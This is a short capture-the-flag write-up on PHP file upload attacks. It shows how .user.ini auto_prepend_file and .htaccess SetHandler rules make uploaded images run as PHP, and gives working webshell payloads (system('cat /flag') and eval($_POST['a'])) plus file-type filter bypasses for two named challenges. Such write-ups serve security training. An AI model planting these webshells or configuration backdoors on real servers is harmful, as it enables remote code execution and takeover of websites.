File upload vulnerability (.user.ini and .htaccess)
一 、 user.ini
.user.ini is actually a php.ini that can be "customized" by the user. The settings we can customize are the settings with the mode "PHP_INI_PERDIR, PHP_INI_USER". In fact, all modes other than PHP_INI_SYSTEM (including PHP_INI_ALL) can be set through .user.ini.
Unlike php.ini, .user.ini is an ini file that can be dynamically loaded. That is to say, after I modify the .user.ini, I don’t need to restart the server middleware. I only need to wait for the time set by user_ini.cache_ttl (the default is 300 seconds) before it can be reloaded.
We can easily construct a "backdoor" with the help of the .user.ini file. auto_append_file, auto_prepend_file
auto_prepend_file=01.gif
01.gif is the file to be included.
Therefore, we can easily make all php files "automatically" include a certain file with the help of .user.ini, and this file can be a normal php file or a webshell containing a sentence.
Sample question: [SUCTF 2019]CheckIn
1. The test found:
Server is nginx
File content cannot contain<?
php exif_imagetype()
function, just add the image file header GIF89a
2. After reading .user.ini
the analysis, our thinking should be clearer, we can upload one like this .user.ini
:
GIF89a
auto_prepend_file=a.jpg
3. At this time, we noticed that there is still an index.php in the upload directory, we just need an executable php file in this directory, then this simply exposes the test point .user.ini
, it seems that this idea should be feasible
Then upload a picture like this: a.jpg:
GIF89a
<script language='php'>system('cat /flag');</script>
Finally, we visit http://9f26d33b-a50f-44fd-8485-c2721470c2a1.node3.buuoj.cn/uploads/e2e7ec165ba05a5e1f3198caa7e22b54/index.php
You can get the flag
Two, .htaccess
1. Generally .htaccess can be used to leave a backdoor and bypass the blacklist
Create a txt write
AddType application/x-httpd-php
Let all files parse as php
2. Leave the backdoor and add php parsing rules in .htaccess
Similar to parsing the file name containing 1 into php
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
12345.png will be executed in php
Example: [GXYCTF2019]BabyUpload
1. File type bypass:
Content-Type: image/jpeg
2. First upload a .htaccess file with the following content
SetHandler application/x-httpd-php
3. The suffix of the file name cannot start with ph, and the file content is filtered. <?
Upload such a picture horse:
GIF89a?
<script language="php">eval($_POST['a']);</script>
4. On the Ant Sword